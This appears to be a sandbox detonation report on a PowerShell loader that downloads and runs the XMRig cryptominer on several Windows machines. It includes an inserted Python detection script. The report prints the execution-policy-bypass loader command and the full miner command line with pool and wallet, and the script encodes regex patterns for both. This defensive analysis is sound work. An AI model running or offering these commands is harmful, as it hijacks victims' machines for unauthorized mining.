memory/4760-141-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-142-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-143-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-144-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-145-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-146-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-147-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-148-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-149-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-150-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-151-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-152-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-153-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-154-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-155-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:06

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1742s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; no description, indicator, process or target recorded for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 4.73.50.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/4184-4-0x00007FFBE0F83000-0x00007FFBE0F84000-memory.dmp

memory/4184-5-0x000001EE67220000-0x000001EE67242000-memory.dmp

memory/4184-9-0x00007FFBE0F80000-0x00007FFBE196C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_52t5cjcj.im2.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4184-8-0x000001EE67420000-0x000001EE67496000-memory.dmp

memory/4184-20-0x00007FFBE0F80000-0x00007FFBE196C000-memory.dmp

memory/4184-25-0x00007FFBE0F80000-0x00007FFBE196C000-memory.dmp

memory/4184-48-0x000001EE673C0000-0x000001EE673D2000-memory.dmp

memory/4184-61-0x000001EE673A0000-0x000001EE673AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1408-90-0x000002A0E5BC0000-0x000002A0E5BE0000-memory.dmp

memory/1408-91-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-92-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/4184-93-0x00007FFBE0F83000-0x00007FFBE0F84000-memory.dmp

memory/4184-94-0x00007FFBE0F80000-0x00007FFBE196C000-memory.dmp

memory/4184-95-0x00007FFBE0F80000-0x00007FFBE196C000-memory.dmp

memory/1408-96-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-97-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-98-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-99-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-100-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-101-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-102-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-103-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-104-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-105-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-106-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-107-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-108-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-109-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-110-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-111-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-112-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-113-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-114-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-115-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-116-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-117-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-118-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-119-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-120-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-121-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-122-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-123-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-124-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-125-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-126-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-127-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-128-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-129-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-130-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-131-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-132-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-133-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-134-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-135-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-136-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-137-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-138-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-139-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-140-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-141-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-142-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-143-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-144-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-145-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-146-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-147-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-148-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-149-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-150-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-151-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-152-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-153-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-154-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-155-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-156-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:18

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; no description, indicator, process or target recorded for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
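The two command lines above carry the whole chain in clear text: powershell.exe started with -ExecutionPolicy bypass against a script in the user's Temp directory, then xmrig.exe pointed at a stratum+ssl pool with an unMineable-style COIN:address.worker login. As an added example (not part of the sandbox report or of XMRig), the Python below turns those observations into process-telemetry detection rules and runs them over constructed Sysmon-style events that embed the two recorded command lines plus a benign control; the event layout, the rule names and the control event's PID are assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed process-creation events (Sysmon Event ID 1 style, trimmed to the
# fields the rules need). The two malicious command lines are copied from the
# Processes section above; the notepad event is a benign control. PIDs 3080 and
# 388 are taken from the memory-dump names; the control PID is invented.
SAMPLE_EVENTS = [
    {"pid": 3080,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -ExecutionPolicy bypass -File '
            r'"C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"'},
    {"pid": 388,
     "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "cmd": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
            r'-o stratum+ssl://rx.unmineable.com:443 '
            r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'
            r'.unmineable_worker_vilqtiac -p x'},
    {"pid": 4120,
     "image": r"C:\Windows\System32\notepad.exe",
     "cmd": r'"C:\Windows\System32\notepad.exe" C:\Users\Admin\notes.txt'},
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
# stratum[+ssl|+tls|+tcp]://host:port, the URI form XMRig takes after -o/--url
POOL_URI = re.compile(r"^stratum(?:\+(ssl|tls|tcp))?://(?P<host>[^:/]+):(?P<port>\d+)$", re.I)
# Monero standard (4...) or subaddress (8...): 95 Base58 characters
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)

@dataclass
class Finding:
    pid: int
    rule: str
    detail: dict = field(default_factory=dict)

def split_windows_cmdline(cmd):
    """Split on whitespace while keeping double-quoted arguments intact."""
    return [quoted if quoted else bare for quoted, bare in _TOKEN.findall(cmd)]

def parse_options(args):
    """Map '-k v', '--key v' and '--key=v' to {key_lower: value}; bare flags map to ''."""
    opts, i = {}, 0
    while i < len(args):
        tok = args[i]
        if tok.startswith("-"):
            if tok.startswith("--") and "=" in tok:
                key, val = tok.split("=", 1)
                opts[key.lower()] = val
            elif i + 1 < len(args) and not args[i + 1].startswith("-"):
                opts[tok.lower()] = args[i + 1]
                i += 1
            else:
                opts[tok.lower()] = ""
        i += 1
    return opts

def _opt(opts, *names):
    """Value of the first option present among names (aliases), else ''."""
    return next((opts[n] for n in names if n in opts), "")

def inspect_event(ev):
    """Apply the miner and loader rules to one event and return its findings."""
    findings = []
    image = ev["image"].lower()
    opts = parse_options(split_windows_cmdline(ev["cmd"])[1:])

    if "xmrig" in image.rsplit("\\", 1)[-1]:
        findings.append(Finding(ev["pid"], "miner.xmrig_image", {"image": ev["image"]}))

    pool = POOL_URI.match(_opt(opts, "-o", "--url"))
    if pool:
        user = _opt(opts, "-u", "--user")
        # unMineable expects COIN:address.worker; most pools take address[.worker]
        coin, _, account = user.partition(":") if ":" in user else ("", "", user)
        address, _, worker = account.partition(".")
        findings.append(Finding(ev["pid"], "miner.stratum_pool", {
            "pool_host": pool["host"], "pool_port": int(pool["port"]),
            "tls": (pool.group(1) or "").lower() in ("ssl", "tls"),
            "algo": _opt(opts, "-a", "--algo").lower(),
            "coin": coin, "wallet": address, "worker": worker,
            "monero_address": bool(MONERO_ADDR.match(address)),
        }))

    # powershell.exe accepts -ex/-ep for -ExecutionPolicy and -f for -File
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        policy = _opt(opts, "-executionpolicy", "-ex", "-ep").lower()
        script = _opt(opts, "-file", "-f")
        if policy == "bypass" and TEMP_DIR.search(script):
            findings.append(Finding(ev["pid"], "loader.powershell_bypass_temp_script",
                                    {"script": script}))
    return findings

def scan(events):
    """Run inspect_event over every event."""
    return [f for ev in events for f in inspect_event(ev)]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.pid, f.rule, f.detail)
```

The miner rule keys on the pool URI rather than on the file name, so a renamed binary is still caught, and it surfaces the wallet and worker for pivoting to other detonations of the same campaign. The SeLockMemoryPrivilege requests recorded in the Signatures section (XMRig asks for it to back RandomX with large pages) are a separate token-privilege signal not covered by this command-line check.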

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.43:443 tcp

Files

memory/3080-0-0x00007FFD0CE63000-0x00007FFD0CE65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_osxajhmk.mrd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3080-9-0x00000237E65C0000-0x00000237E65E2000-memory.dmp

memory/3080-10-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp

memory/3080-11-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp

memory/3080-12-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp

memory/3080-14-0x00000237E69A0000-0x00000237E69B2000-memory.dmp

memory/3080-15-0x00000237E6980000-0x00000237E698A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/388-46-0x0000024816A60000-0x0000024816A80000-memory.dmp

memory/388-47-0x00000248AA7D0000-0x00000248AA7F0000-memory.dmp

memory/388-48-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/3080-49-0x00007FFD0CE63000-0x00007FFD0CE65000-memory.dmp

memory/3080-50-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp

memory/388-52-0x00000248AAE40000-0x00000248AAE60000-memory.dmp

memory/388-51-0x00000248AAC10000-0x00000248AAC30000-memory.dmp

memory/388-53-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-54-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-57-0x00000248AAE40000-0x00000248AAE60000-memory.dmp

memory/388-56-0x00000248AAC10000-0x00000248AAC30000-memory.dmp

memory/388-55-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-58-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-59-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-60-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-61-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-62-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-63-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-64-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-65-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-66-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-67-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-68-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-69-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-70-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-71-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-72-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-73-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-74-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-75-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-76-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-77-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-78-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-79-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-80-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-81-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-82-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-83-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-84-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-85-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-86-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-87-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-88-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-89-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-90-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-91-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-92-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-93-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-94-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-95-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-96-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-97-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-98-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-99-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-100-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-101-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-102-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-103-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-104-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-105-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-106-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-107-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-108-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-109-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-110-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-111-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-112-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-113-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-114-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-115-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-116-0x00007FF742750000-0x00007FF743383000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:50

Platform

win10v2004-20240226-en

Max time kernel

1793s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits, all columns N/A (the sandbox recorded no description, indicator, process or target for this signature)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3608 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4292 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 216.58.215.42:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 42.215.58.216.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
BE 23.55.97.181:80 www.microsoft.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 181.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 198.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 153.97.55.23.in-addr.arpa udp
